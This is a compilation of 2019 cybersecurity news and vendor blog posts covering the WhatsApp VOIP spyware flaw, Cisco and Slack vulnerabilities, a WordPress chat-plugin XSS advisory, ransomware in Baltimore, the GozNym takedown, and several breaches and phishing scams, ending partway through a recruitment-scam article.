WhatsApp suffers from a buffer overflow weakness, meaning an attacker can leverage it to run malicious code on the device. Data packets can be manipulated during the start of a voice call, leading to the overflow being triggered and the attacker commandeering the application. Attackers can then deploy surveillance tools to the device to use against the target.

A buffer overflow vulnerability in WhatsApp VOIP (voice over internet protocol) stack allows remote code execution via a specially-crafted series of SRTP (secure real-time transport protocol) packets sent to a target phone number.

Affected Versions:

  • WhatsApp for Android prior to v2.19.134
  • WhatsApp Business for Android prior to v2.19.44
  • WhatsApp for iOS prior to v2.19.51
  • WhatsApp Business for iOS prior to v2.19.51
  • WhatsApp for Windows Phone prior to v2.18.348
  • WhatsApp for Tizen prior to v2.18.15.

The Alleged Exploit

An exploit of the vulnerability was used in an attempted attack on the phone of a UK-based attorney on 12 May, the  Financial Times reported. The reported attack involved using WhatsApp’s voice calling function to ring a target’s device. Even if the call was not picked up, the surveillance software could be installed.

How MVISION Mobile can combat CVE-2019-3568 Attacks

To date, the detection technology inside MVISION Mobile has detected 100 percent of zero-day device exploits without requiring an update.

MVISION Mobile helps protect customers by identifying at-risk iOS and Android devices and active threats trying to leverage the vulnerability. It leverages Advanced App Analysis capabilities to help administrators find all devices that are exposed to the WhatsApp vulnerability by identifying all devices that have the vulnerable versions of WhatsApp on them and establish custom policies to address the risk. If the exploit attempts to elevate privileges and compromise the device, MVISION Mobile would detect the attack on the device.

For more information about MVISION Mobile, download our datasheet or visit our web site.

The post How MVISION Mobile can combat the WhatsApp Buffer Overflow Vulnerability appeared first on McAfee Blogs.

New research: How effective is basic account hygiene at preventing hijacking

Every day, we protect users from hundreds of thousands of account hijacking attempts. Most attacks stem from automated bots with access to third-party password breaches, but we also see phishing and targeted attacks. Earlier this year, we suggested how just five simple steps like adding a recovery phone number can help keep you safe, but we wanted to prove it in practice.
We teamed up with researchers from New York University and the University of California, San Diego to find out just how effective basic account hygiene is at preventing hijacking. The year-long study, on wide-scale attacks and targeted attacks, was presented on Wednesday at a gathering of experts, policy makers, and users called The Web Conference.
Our research shows that simply adding a recovery phone number to your Google Account can block up to 100% of automated bots, 99% of bulk phishing attacks, and 66% of targeted attacks that occurred during our investigation.

Google’s automatic, proactive hijacking protection
We provide an automatic, proactive layer of security to better protect all our users against account hijacking. Here’s how it works: if we detect a suspicious sign-in attempt (say, from a new location or device), we’ll ask for additional proof that it’s really you. This proof might be confirming you have access to a trusted phone or answering a question where only you know the correct response.
If you’ve signed into your phone or set up a recovery phone number, we can provide a similar level of protection to 2-Step Verification via device-based challenges. We found that an SMS code sent to a recovery phone number helped block 100% of automated bots, 96% of bulk phishing attacks, and 76% of targeted attacks. On-device prompts, a more secure replacement for SMS, helped prevent 100% of automated bots, 99% of bulk phishing attacks and 90% of targeted attacks.

Both device- and knowledge-based challenges help thwart automated bots, while device-based challenges help thwart phishing and even targeted attacks.

If you don’t have a recovery phone number established, then we might fall back on the weaker knowledge-based challenges, like recalling your last sign-in location. This is an effective defense against bots, but protection rates for phishing can drop to as low as 10%. The same vulnerability exists for targeted attacks. That’s because phishing pages and targeted attackers can trick you into revealing any additional identifying information we might ask for.
Given the security benefits of challenges, one might ask why we don’t require them for all sign-ins. The answer is that challenges introduce additional friction and increase the risk of account lockout. In an experiment, 38% of users did not have access to their phone when challenged. Another 34% of users could not recall their secondary email address.
If you lose access to your phone, or can’t solve a challenge, you can always return to a trusted device you previously logged in from to gain access to your account.

Digging into “hack for hire” attacks
Where most bots and phishing attacks are blocked by our automatic protections, targeted attacks are more pernicious. As part of our ongoing efforts to monitor hijacking threats, we have been investigating emerging “hack for hire” criminal groups that purport to break into a single account for a fee on the order of $750 USD. These attackers often rely on spear phishing emails that impersonate family members, colleagues, government officials, or even Google. If the target doesn’t fall for the first spear phishing attempt, follow-on attacks persist for upwards of a month.

Example man-in-the-middle phishing attack that checks for password validity in real-time. Afterwards, the page prompts victims to disclose SMS authentication codes to access the victim’s account.

We estimate just one in a million users face this level of risk. Attackers don’t target random individuals though. While the research shows that our automatic protections can help delay, and even prevent as many as 66% of the targeted attacks that we studied, we still recommend that high-risk users enroll in our Advanced Protection Program. In fact, zero users that exclusively use security keys fell victim to targeted phishing during our investigation.

Take a moment to help keep your account secure
Just like buckling a seat belt, take a moment to follow our five tips to help keep your account secure. As our research shows, one of the easiest things you can do to protect your Google Account is to set up a recovery phone number. For high-risk users—like journalists, activists, business leaders, and political campaign teams—our Advanced Protection Program provides the highest level of security. You can also help protect your non-Google accounts from third-party password breaches by installing the Password Checkup Chrome extension.

1 Minute Quick Privacy Ref-ernces

If you have a moment take a look at our 1 minute videos to get caught up on the latest things going on in the privacy community. California Consumer Protection Act – Ben Siegel discusses the California Consumer Protection Act and how some of the advancing Amendments can drastically change the CCPA. Privacy Awareness Ideas […]

The post 1 Minute Quick Privacy Ref-ernces appeared first on Privacy Ref Blog.

Cisco AMP for Endpoints excelling in AV Comparatives Business Main Test Series

AV-Comparatives have long been the benchmark of 3rdparty testing in the endpoint security space. This year, for the first time ever, AMP for Endpoints participated in AV-Comparatives malware testing. The Business Main Test Series was broken up into two main sections: the Malware Protection Test and Business Real-World Protection Test.

While the full report will be released in July, AV-Comparatives released a short fact sheet today. Because the test is only partially completed, the results will continue to vary, but Cisco AMP for Endpoints expects to maintain consistently high scores.


First, let’s give the brief facts behind the Business Main Test Series:

  • 19 products are participating
  • All products tested on a Windows 10 RS5 64-bit
  • All vendors were allowed to configure their products
  • Cloud and PUA detection activated in all products

Given these parameters, the 19 products will participate in a fourth month test culminating in July. At this midpoint, however, the products have participated in the two aforementioned tests.

For more information on specific configurations and a list of all participants, read the full fact sheet here.

Malware Protection Test 

In this test, the products were tested with 1,311 different malware samples. Based on criteria defined by AV-Comparatives in their report, the products were given parameters to detect the malware samples.

So far, AMP for Endpoints is one of eight products to have a malware protection rate of 99.8% or higher. In addition to this extremely high detection rate, AMP for Endpoints registered 0 false alarms on common business software.

AV-Comparatives also performed tests on non-business software. This will not affect the final “Approved Business Product” rating they deliver, but the results are notable as it helps to demonstrates how well a product can really delineate between good and bad. Cisco AMP for Endpoints was granted the highest rating of “very low “which denotes 0-5 false positives on non-business software.

Cisco AMP for Endpoints consistently pledges to deliver elite threat detection, investigation, and response. The 99.8% malware protection rate so far highlights Cisco AMP for Endpoint’s ability to deliver on that pledge. At the same time, the low number of false positives shows that Cisco AMP for Endpoints does not need to bog down IT professionals with useless alerts allowing them to focus on what’s really important.

Real-World Protection Test

Over the course of two months, the products encountered 389 test cases. Of the 389 test cases, Cisco AMP For Endpoints has blocked all but three while producing ZERO false alarms. Resulting in a 99.2% protection rate so far. Cisco AMP For Endpoints is only one of three products to have zero false alarms. Others have already flagged up to 18 false alarms.


It is important to note that this test has not concluded. We are, however, very excited for a continued strong showing from Cisco AMP for Endpoints in the second half of the test. So far, Cisco AMP for Endpoints has already shown an elite combination of threat detection, investigation, and response combined with low false positives designed to empower IT professionals to quickly identify and respond to threats.

For more on the report, click here.

To try AMP for Endpoints for free, sign up for the free trial.

Cyber News Rundown: WhatsApp Vulnerability Could Install Spyware

Reading Time: ~2 min.

WhatsApp Exploited to Install Spyware through Calls

A serious flaw has been discovered in the messaging app WhatsApp that would allow an attacker to install spyware on a victim’s device by manipulating the packets being sent during the call. Further disguising the attack, the malicious software could be installed without the victim answering the call, and with access to the device the attacker could also delete the call log. Fortunately, the Facebook-owned app was quick to respond and quickly released an update for affected versions. 

SIM Swapping Group Officially Charged

Nine men in their teens and 20s have been arrested and charged for a SIM-swapping operation that netted the group over $2 million in stolen cryptocurrency. The group operated by illicitly gaining access to phone accounts by having the phone swapped to a SIM card in their control. The group would then fraudulently access cryptocurrency accounts by bypassing 2-factor authentication, since login codes were sent to devices under their control. Three of the group were former telecom employees with access to the systems needed to execute the scam.

Web Trust Seal Injected with Keylogger

A recent announcement revealed that scripts for the “Trust Seals” provided by Best of the Web to highly-rated websites were compromised and redesigned to capture keystrokes from site visitors. While Best of the Web was quick to resolve the issue, at least 100 sites are still linking customers to the compromised seals. This type of supply chain attack has risen in popularity recently. Hackers have been seen injecting payment stealing malware into several large online retailer’s websites since the beginning of the year.

Fast Retailing Data Breach

The online vendor Fast Retailing is currently investigating a data breach that gave attackers full access to nearly half a million customer accounts for two of the brand’s online stores. The attack took place within the last three weeks and targeted payment information with names and addresses for customers of UNIQLO Japan and GU Japan. Fast Retailing has since forced a password reset for all online customers and delivered emails with further information for those affected by the attack.

Data Leak in Linksys Routers

Last week researchers discovered a flaw in over 25,000 Linksys routers that could give attackers access to not only the device’s MAC address, but also device names and other critical settings that could compromise the security of anyone using the router. Additionally, by identifying the device’s IP address, attackers could even use geolocation to gauge the approximate location of the exploited device, all without authentication.

The post Cyber News Rundown: WhatsApp Vulnerability Could Install Spyware appeared first on Webroot Blog.

Cisco addressed a critical flaw in networks management tool Prime Infrastructure

Cisco had issued security updates to address 57 security flaw, including three flaws in networks management tool Prime Infrastructure.

One of the flaws addressed by Cisco in the Prime Infrastructure management tool could be exploited by an unauthenticated attacker to execute arbitrary code with root privileges on PI devices.

“Multiple vulnerabilities in the web-based management interface of Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow a remote attacker to gain the ability to execute arbitrary code with elevated privileges on the underlying operating system.” reads the advisory published by Cisco.

“One of these issues, CVE-2019-1821, can be exploited by an unauthenticated attacker that has network access to the affected administrative interface.”

The remaining two issues, tracked as CVE-2019-1822 and CVE-2019-1823, could be exploited by an attacker that has valid credentials to authenticate to the impacted administrative interface.

The flaws affect Cisco Prime Infrastructure Software releases prior to 3.4.1, 3.5, and 3.6, and EPN Manager Releases prior to 3.0.1.

The vulnerabilities were discovered by Steven Seeley of Source Incite.

“These vulnerabilities exist because the software improperly validates user-supplied input,” continues the advisory. “An attacker could exploit these vulnerabilities by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system.”

Cisco PSIRT experts are aware of any attacks exploiting the flaws in the wild.

Cisco Prime Infrastructure

A few days ago, Cisco fixed the Thrangrycat, a vulnerability tracked as CVE-2019-1649 that affects multiple Cisco products supporting the Trust Anchor module (TAm). The issue could be exploited by an attacker to fully bypass Cisco’s Trust Anchor module (TAm) via Field Programmable Gate Array (FPGA) bitstream manipulation.

Pierluigi Paganini

(SecurityAffairs – Cisco Prime infrastructure, hacking)

The post Cisco addressed a critical flaw in networks management tool Prime Infrastructure appeared first on Security Affairs.

This Week in Security News: Unsecured Servers and Vulnerable Processors


Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about vulnerabilities that can allow hackers to retrieve data from CPUs and mine cryptocurrency.

Read on:

May’s Patch Tuesday Include Fixes for ‘Wormable’ Flaw in Windows XP, Zero-Day Vulnerability

Microsoft’s May security release includes updates for 80 vulnerabilities for a number of Microsoft products, including a security update for unsupported operating systems such as Windows XP and Server 2003.

Trend Micro Unveils Cloud-Native Security Customized to the Demand of DevOps

Trend Micro launched container security capabilities added to Trend Micro Deep Security to elevate protection across the entire DevOps lifecycle and runtime stack.

Side-Channel Attacks RIDL, Fallout, and ZombieLoad Affect Millions of Vulnerable Intel Processors

Researchers found a bevy of critical vulnerabilities in modern Intel processors that, when exploited successfully, can leak or let hackers retrieve data being processed by the vulnerable CPUs.

Trump Issues Executive Order Paving Way for Ban on Huawei

President Trump has issued an executive order declaring a national emergency and prohibiting U.S. companies from using telecom services that are solely owned, controlled, or directed by a foreign adversary, clearing the way for a ban on the Chinese-owned Huawei.

Unsecured Server Leaks PII of Almost 90% of Panama Residents

The personally identifiable information of almost 90% of Panama’s population has been divulged due to an unsecured Elasticsearch server that was found without authentication or firewall protection, connected to the internet, and publicly viewable on any browser.

Google Discloses Security Bug in its Bluetooth Titan Security Keys, Offers Free Replacement

Google says that the security bug, which could allow an attacker in close physical proximity to circumvent the security the key is supposed to provide, is due to a “misconfiguration in the Titan Security Keys’ Bluetooth pairing protocols.”

Jenkins Vulnerability Exploited to Drop Kerberods Malware and Launch Monero Miner

Threat actors were found exploiting CVE-2018-1000861, a vulnerability in the Stapler web framework that is used by the Apache Jenkins open-source software development automation server with versions 2.153 and earlier.

Crypto Exchange Binance Restarting Services After Post-Hack Upgrade

Cryptocurrency exchange Binance has announced that it is back online after completing a security upgrade prompted by a recent hack that saw 7,000 BTC worth $41 million stolen.

Do you worry about your personally identifiable information being divulged to cyber criminals? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.



The post This Week in Security News: Unsecured Servers and Vulnerable Processors appeared first on .

Download Hijack Flaw Patched in Slack Patches for Windows

Download Hijack Flaw Patched in Slack Patches for Windows

Slack users have been urged to upgrade their applications and clients to the most recent version, 3.4.0, after Tenable researcher David Wells discovered a new vulnerability that would allow an attacker to share malicious hyperlinks that could alter where a victim’s files were stored.

Wells discovered a download hijack vulnerability in Slack Desktop version 3.3.7 for Windows. “This vulnerability, which has been patched, would have allowed an attacker to post a crafted hyperlink into a Slack channel or private conversation that changes the document download location path when clicked. It does require user interaction to exploit, giving it a CVSSv2 score of 5.5 (Medium),” today’s press release said.

If users click on the link, an attacker could not only steal future documents downloaded within Slack but also manipulate them, such as injecting malicious code that would compromise the victim’s machine once opened, according to Wells.

The attack reportedly can be performed through any Slack direct messaging or Slack channel to which an attacker might be authenticated.

“Using this attack vector, an insider could exploit this vulnerability for corporate espionage, manipulation, or to gain access to documents outside of their purview," which Wells discusses in depth in his blog post.

The flaw was found in the Slack desktop application for Windows version 3.3.7, which Tenable reported to Slack via HackerOne. “Slack patched the bug as part of its latest update for Slack Desktop Application for Windows, v3.4.0. Slack investigated and found no indication that this vulnerability was ever utilized, nor reports that its users were impacted. As always, users are encouraged to upgrade their apps and clients to the latest available version,” a Slack spokesperson said.

“The digital economy and global distributed workforce have brought new technologies to market with the ultimate goal of seamless connectivity,” said Renaud Deraison, co-founder and chief technology officer, Tenable. “But it’s critical that organizations realize this emerging technology is potentially vulnerable and part of their expanding attack surface. Tenable Research continues to work with vendors such as Slack to disclose our discoveries to ensure consumers and organizations are secure.”

Epsiode 495 – Tools, Tips and Tricks – Mozilla Observatory

This week’s tools, tips and tricks is about Mozilla Obersvatory. This is a web scanner meant to help developers and security professionals fix and make their web apps more secure. Mozilla Observatory. Be aware, be safe. *** Support the podcast with a cup of coffee *** – Ko-Fi Security In Five Don’t forget to subscribe […]

The post Epsiode 495 – Tools, Tips and Tricks – Mozilla Observatory appeared first on Security In Five.

More Orgs Use Booby Traps for Counterintelligence

More Orgs Use Booby Traps for Counterintelligence

A recent survey found that to gain counterintelligence the vast majority of organizations would allow an attacker to take decoy files rather than stop an attack in progress, according to the latest International Cyber Benchmark Index from the Neustar International Security Council (NISC).

A reported one in five companies are currently employing forensic investigations, as well as setting up honey pots and repositories of fake data to lure attackers in, but an impressive 71% of respondents said that instead of shutting down an attack when a bad actor accesses a deceptive file, they would be willing to let the malicious actors take booby-trapped document, according to a May 16 press release.

Being able to collect intelligence could allow defenders to identify thieves in the future, potentially revealing information about the location, ownership and possible vulnerabilities of the hackers’ machines, the press release said.

Of the respondents surveyed, 51% said their enterprise had suffered a distributed denial-of-service (DDoS) attack, and 52% of participants also identified phishing as a growing threat with targeted hacking. DDoS attacks followed close behind at 49%.

“Security leaders increasingly feel that breaches are inevitable, and there is a growing appetite for advanced forensic tools that can deliver insights around attacker attribution and tactics in real time,” said Rodney Joffe, chairman of NISC and Neustar SVP and fellow.

“Whether they opt to use them like an alarm system, ejecting bad actors from the network upon contact with a honey pot or deceptive file, or for a more sophisticated counterintelligence operation that gathers vital information on attacker movements and methods, cybersecurity professionals want solutions that can provide better real-time awareness and understanding of the enemy.”

According to the survey, the threat of social engineering continues to rise across all vectors, with 48% of respondents admitting they witnessed an uptick in attempts via email, 38% noting a rise in text-based attempts and 36% reporting a rise in attempts via phone.

Responses showed that security pros are more aware not only of where attacks are originating but also of the types of attacks that pose the greatest threats.

Baltimore Won’t Pay Ransom, Systems Remain Down

Baltimore Won't Pay Ransom, Systems Remain Down

The city of Baltimore’s computer systems have remained down since a ransomware attack hit more than a week ago, but the city says it will not pay the ransom despite today’s final 10-day deadline, according to copy of the ransom note obtained by the Baltimore Sun.

The May 7 note warned that if the ransom were not paid within 10 days, the city would no longer be able to have its files returned. In the aftermath of the attack, Baltimore has reverted to using manual systems while it continues efforts to restore the downed system.

From the transportation department to the department of public works and even closing on real estate deals, everything is being held up in what CCN called “the most extensive attacks in history, affecting nearly every important aspect of city life.”

Despite the attackers warning that if the city called the FBI they would cut off contact, federal investigators are assisting in the efforts to free the crippled city. The message from Mayor Jack Young is clear – the city will not pay the ransom, according to WMAR.

As the city struggles to free itself from the constraints of this attack, city officials are looking for ways to be better prepared for future attacks. On May 16, Baltimore city council president Brandon Scott said he was launching a committee on cybersecurity and emergency preparedness.

“This cyber attack against Baltimore City government is a crisis of the utmost urgency,” Scott said, according to The Hill. “That is why I will convene a select committee, co-chaired by Councilman Eric Costello and Councilman Isaac ‘Yitzy’ Schleifer, to examine the City's coordination of cybersecurity efforts, including the Administration's response to the cybersecurity attack and testimony from cybersecurity experts.”

WhatsApp Will Never be Safe, Says Telegram Founder

In a direct attack on WhatsApp, Telegram founder Pavel Durov has stated that the Facebook-owned WhatsApp would never be safe.

In a statement that he had written on Telegraph Pavel Durov points out that hackers could access anything- photos, emails, texts etc- on any phone that had WhatsApp installed on it. He even discusses the security issue that WhatsApp recently faced- that of a high severity bug that could allow hackers to inject spyware remotely into a phone simply by making a WhatsApp call.

Durov writes, “Every time WhatsApp has to fix a critical vulnerability in their app, a new one seems to appear in its place. All of their security issues are conveniently suitable for surveillance, and look and work a lot like backdoors.”

He points out that unlike Telegram, WhatsApp is not an open source platform and hence it never allows security researchers to easily check if there are backdoors in its code. Instead of publishing its code, WhatsApp deliberately obfuscates their apps’ binaries so that no one is able to study them thoroughly, he adds.

Durov explains that back in 2012, when he was working to develop Telegram, WhatsApp was still transferring messages in plain-text in transit and not just governments or hackers, but mobile providers and even Wi-Fi admins had access to all WhatsApp texts.

WhatsApp later added some encryption, but the key to decrypt messages was available with several governments, who could thus decrypt conversations on WhatsApp very easily. Durov says, “Then, as Telegram started to gain popularity, WhatsApp founders sold their company to Facebook and declared that “Privacy was in their DNA”. If true, it must have been a dormant or a recessive gene.”

Discussing how the end-to-end encryption introduced in 2016 by WhatsApp works, Pavel Durov says, “3 years ago WhatsApp announced they implemented end-to-end encryption so “no third party can access messages“. It coincided with an aggressive push for all of its users to back up their chats in the cloud. When making this push, WhatsApp didn’t tell its users that when backed up, messages are no longer protected by end-to-end encryption and can be accessed by hackers and law enforcement. Brilliant marketing, and some naive people are serving their time in jail as a result.”

Durov also explains that those who don’t go for the backup thing could also be traced in many ways. He says that the metadata generated by WhatsApp users is leaked to different agencies in large volumes by WhatsApp’s mother company. Added to all this, there are critical vulnerabilities coming one after the other.

He writes, “WhatsApp has a consistent history – from zero encryption at its inception to a succession of security issues strangely suitable for surveillance purposes. Looking back, there hasn’t been a single day in WhatsApp’s 10 year journey when this service was secure. That’s why I don’t think that just updating WhatsApp’s mobile app will make it secure for anyone.”

In his statement, Durov explains why people can’t stop using WhatsApp all of a sudden. He says that a lot of people can’t do this because their friends and families still continue to use WhatsApp. He writes, “It means we at Telegram did a bad job of persuading people to switch over. While we did attract hundreds of millions of users in the last five years, this wasn’t enough. The majority of internet users are still held hostage by the Facebook/WhatsApp/Instagram empire. Many of those who use Telegram are also on WhatsApp, meaning their phones are still vulnerable.”

Durov says this about Telegram- “In almost 6 years of its existence, Telegram hasn’t had any major data leak or security flaw of the kind WhatsApp demonstrates every few months. In the same 6 years, we disclosed exactly zero bytes of data to third-parties, while Facebook/WhatsApp has been sharing pretty much everything with everybody who claimed they worked for a government.”

He explains that unlike Facebook, which has a huge marketing department, Telegram does zero marketing and wouldn’t want to pay journalists and researchers to write about it. It instead relies on its users.

Well, that’s the gist of what the Telegram founder has to say. Let’s wait for the other side of the story. Let’s wait and see if WhatsApp comes up with its own statements defending itself, in response to what all Pavel Durov had written.



Related Resources:

A Quick Glimpse On The WhatsApp “Spyware” Issue

The WhatsApp Gold Scam is Back, in a New Form!

WhatsApp Launches Service to Fight Fake News in India

SpyDealer Android Malware Steals Data from WhatsApp and Facebook

The post WhatsApp Will Never be Safe, Says Telegram Founder appeared first on .

Why Are Cryptographers Being Denied Entry into the US?

In March, Adi Shamir -- that's the "S" in RSA -- was denied a US visa to attend the RSA Conference. He's Israeli.

This month, British citizen Ross Anderson couldn't attend an awards ceremony in DC because of visa issues. (You can listen to his recorded acceptance speech.) I've heard of at least one other prominent cryptographer who is in the same boat. Is there some cryptographer blacklist? Is something else going on? A lot of us would like to know.

Stack Overflow Discloses Digital Attack against Production Systems

Stack Overflow, a popular question and answer site for programmers, disclosed a digital attack in which bad actors accessed its production systems. Mary Ferguson, VP of Engineering at the company, publicly revealed the incident on 16 May. In a statement posted to Stack Overflow’s website, she explained that someone had obtained production-level access to the […]… Read More

The post Stack Overflow Discloses Digital Attack against Production Systems appeared first on The State of Security.

Hacktivist Attacks Have Fallen 95% Since 2015

Hacktivist Attacks Have Fallen 95% Since 2015

The number of publicly disclosed hacktivist attacks has dropped by 95% between 2015 and 2018 thanks to the relative decline of Anonymous, new stats from IBM X-Force have revealed.

The firm claimed that it recorded 35 incidents in 2015, but the number dropped to just five two years later and two by 2018, with none so far this year.

The number attributed to the Anonymous dropped from eight incidents in 2015 to only one tracked in 2018. This is significant as the hacktivist collective accounted for almost 45% of all attacks between 2015 and 2018.

Other groups tend to strike once or twice and then disappear, security analyst Camille Singleton explained in a blog post.

“Starting around 2010, Anonymous became one of the most prolific hacktivist groups in the world, reaching a peak of activity in early- to mid-2016, according to IBM X-Force data. Since then, attacks by Anonymous have declined significantly, possibly due to an attrition of key leadership, differences of opinion and a struggle to find an ideological focus,” she said.

“In addition to differences in viewpoint, several cyber actors have sought to masquerade as Anonymous actors over the past three years, using the moniker in an attempt to legitimize their actions or to tarnish the group’s name by connecting their activities to Anonymous.”

Another potential factor in the decline of hacktivist activity is law enforcement activity. Singleton claimed arrests and legal warnings may be acting as an effective deterrent.

“X-Force IRIS internal tracking of related arrests revealed that law enforcement agencies in the US, UK and Turkey have arrested at least 62 hacktivists since 2011,” she added.

“We suspect the actual number is greater than those publicly announced.”

Three of those arrested received sentences in 2018 and 2019 with jail time of three years or greater. One individual, Martin Gottesfeld, 34, of Somerville, was handed a 10-year sentence after DDoS-ing a Boston hospital in 2014.

Facebook Bans Israeli Firm For Election Meddling

Facebook Bans Israeli Firm For Election Meddling

Facebook has banned an Israeli company from its platform after detecting a massive, coordinated attempt to influence voters in Africa.

In a blog post yesterday, head of cybersecurity policy, Nathaniel Gleicher, revealed his team had been forced to remove 265 Facebook and Instagram accounts, Facebook Pages, Groups and events involved in “coordinated inauthentic behavior” managed by Archimedes Group.

In total, the shadowy Israeli firm ran 65 Facebook accounts, 161 Pages, 23 Groups, 12 events and four Instagram accounts. Its efforts reached a fairly wide audience, with around 2.8 million accounts following one or more of the Pages, while 5,500 accounts joined at least one of the Groups and around 920 people followed one or more of the Instagram accounts.

“The people behind this network used fake accounts to run Pages, disseminate their content and artificially increase engagement. They also represented themselves as locals, including local news organizations, and published allegedly leaked information about politicians,” Gleicher explained.

“The Page administrators and account owners frequently posted about political news, including topics like elections in various countries, candidate views and criticism of political opponents.”

Originating in Israel, the moves targeted users in Nigeria, Senegal, Togo, Angola, Niger and Tunisia, with Facebook also claiming to have found some suspicious activity in Latin America and Southeast Asia.

Around $812,000 was spent on Facebook ads paid for in Brazilian reals, Israeli shekel, and US dollars. They ran from 2012 to 2019, which raises questions about why they weren’t spotted sooner.

“Coordinated inauthentic behavior” is the same moniker used to describe the activity of Russian state-sponsored attempts to interfere with the 2016 US Presidential election, which resulted in the indictment of 13 Russians and three companies from the country.

Archimedes Group, whose tagline is “winning campaigns worldwide,” has now been banned from the social network along with all its subsidiaries and issued with a cease and desist letter.

Europol and US Police Disrupt $100m Cybercrime Gang

Europol and US Police Disrupt $100m Cybercrime Gang

Europol and US authorities are claiming victory after “dismantling” a major international cybercrime gang that used the GozNym banking trojan in an attempt to steal $100m from businesses.

A federal indictment was unsealed yesterday charging 10 members of the group with conspiracy to commit computer fraud, conspiracy to commit wire fraud and bank fraud, and conspiracy to commit money laundering. An eleventh has already been charged in a previous indictment.

Five of the gang are based in Russia and will therefore probably escape justice. However, the leader of the group, Alexander Konovolov — aka “NoNe,” and “none_1” — 35, of Tbilisi, Georgia, is being prosecuted in his home country, along with his alleged right-hand man Marat Kazandjian, aka “phant0m,” 31, of Kazakhstan and Tbilisi.

Another man, Eduard Malanici, aka “JekaProf,” is being prosecuted in his native Moldova for charges relating to alleged provision of crypting services, while Gennady Kapkanov — aka “Hennadiy Kapkanov,” “flux,” “ffhost,” “firestarter,” and “User 41” — 36, of Poltava, Ukraine, is being prosecuted in the eastern European nation for charges of bulletproof hosting for the group via the infamous Avalanche network.

He was arrested in 2018 after shooting an assault rifle at Ukrainian police searching his flat, while another man, Krasimir Nikolov, of Varna, Bulgari, was extradited to the US in 2016 on charges of being the group’s account takeover specialist.

Each man had a specific role and was apparently recruited from Russian-speaking dark web forums. The GozNym malware was distributed to around 41,000 victim computers via phishing emails. Once they captured the victim’s online banking credentials, accounts were accessed and funds transferred to third-party accounts under the group’s control.

“International law enforcement has recognized that the only way to truly disrupt and defeat transnational, anonymized networks is to do so in partnership,” said Pennsylvania US attorney Scott Brady. 

“The collaborative and simultaneous prosecution of the members of the GozNym criminal conspiracy in four countries represents a paradigm shift in how we investigate and prosecute cybercrime.”

Roy Rashti, cybersecurity expert at BitDam, argued that the dismantling of this network is just a drop in the ocean, but a welcome move nonetheless.

“The ‘Goz’ in GozNym stands for the notorious Gozi banker malware which, although not new, was very successfully co-opted and iterated by hackers,” he added.

“This provides yet another example of how adversaries tweak known attacks to bypass legacy security solutions to reach and exploit the end user. This strategy allows cybercrime groups to operate like any successful business — with efficiency, dynamism and always staying one step ahead. That is of course, until they get caught.”

Stack Overflow Q&A platform announced a data breach

The popular question-and-answer platform for programmers Stack Overflow announced on Thursday that is has suffered a data breach.

The news of a data breach makes the headlines, this time the victim is the popular question-and-answer platform for programmers Stack Overflow.

The company announced on Thursday that it has discovered unauthorized access to its production systems over the weekend.

The company immediately launched an investigation. At this time the company did not share technical details about the intrusion, it only revealed that has found no evidence that customer or user data was compromised.

“Over the weekend, there was an attack on Stack Overflow. We have confirmed that some level of production access was gained on May 11.” reads a data breach notification published by Mary Ferguson, VP of Engineering at Stack Overflow. “We discovered and investigated the extent of the access and are addressing all known vulnerabilities,”

Stack Overflow has more than 10 million registered users and it has over 50 million unique visitors every month. The Q&A platform is the most important website of the Stack Exchange Network.

Stack Overflow data breach

In December 2018, another popular Q&A platform, Quora, revealed to have suffered a data breach.

Back in December, the popular Q&A website Quora revealed that has suffered a data breach.

Unknown hackers breached its systems and accessed 100 million user data, exposed data included names, email addresses and hashed password.

Pierluigi Paganini

(SecurityAffairs – data breach, hacking)

The post Stack Overflow Q&A platform announced a data breach appeared first on Security Affairs.

XSS flaw in WordPress Live Chat Plugin lets attackers compromise WP sites

A vulnerability in the Live Chat Support plugin for WordPress could be exploited by attackers to inject malicious scripts in websites using it

Researchers at Sucuri have discovered a stored/persistent cross-site scripting (XSS) vulnerability in the WP Live Chat Support plugin for WordPress.

The flaw could be exploited by remote, unauthenticated attackers to inject malicious scripts in websites running WordPress CMS and using
Live Chat Support plugin. The issue could be exploited by a remote attacker that does not have an account on the affected website.

It has been estimated that the plugin currently has over 60,000 installs, it implements a chat solution for customer engagement and conversion.

Versions of the plugin previous to 8.0.27 are vulnerable to stored/persistent XSS.

Experts pointed out that the attack to trigger this issue can be automated to hit a broad range of victims.

An XSS vulnerability could allow hackers to inject malicious code in websites and compromise visitors’ accounts or expose them to modified page content. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. 

An XSS is persistent when the malicious code is added to a section that is stored on the server. Every time the browser of a visitor loads the page, it parses the malicious code and executes the malicious code.

In order to exploit the vulnerability, it is possible to use an unprotected admin_init hook as attack vector:

Live Chat Support Plugin

Experts discovered that the function wplc_head_basic lack of proper privilege checks while updates the plugin settings.

Live Chat Support Plugin 2

“It then executes an action hook with even more critical settings ” reads the advisory published by Sucuri. ” Since “admin_init” hooks can be called visiting either /wp-admin/admin-post.php or /wp-admin/admin-ajax.php, an unauthenticated attacker could use these endpoints to arbitrarily update the option  “wplc_custom_js”. “

The content of the option is added to every page that loads the live chat support, allowing attackers to inject malicious JavaScript code on multiple pages.

To secure your WordPress install update the WP Live Chat Support pluign to version 8.0.27

Below the timeline of the flaw:

  • April 30, 2019: Initial contact attempt.
  • May 15, 2019: Patch is live.

Pierluigi Paganini

(SecurityAffairs – Live Chat Support, Hacking)

The post XSS flaw in WordPress Live Chat Plugin lets attackers compromise WP sites appeared first on Security Affairs.

Pharmaceutical companies exploited by phishing scam targeting job seekers

Earlier this month, two major pharmaceutical giants issued warnings about phishing emails targeting job hunters.

GlaxoSmithKline and AstraZeneca say they are victims of recruitment scams, in which crooks create fake job adverts to obtain people’s personal and financial details. The bogus ads can be hard to spot, because they use legitimate logos and material, and hide the scammers’ email addresses effectively.

How the scam works

Based on AstraZeneca and GlaxoSmithKline’s statements, this is a fairly standard case of recruitment fraud. Job seekers find the fake advert on a recruitment site and provide their CV, which will typically include the applicant’s name, email address, current employer and other personal details.

The scammers will then email the applicant to say they are being considered, before offering them a job. At this point, one of two things will happen.

The scammers might refer the victim to an employment agent (also fake), who will ask for money to complete registration fees. Alternatively, the victim might report directly to the HR department of the bogus employer.

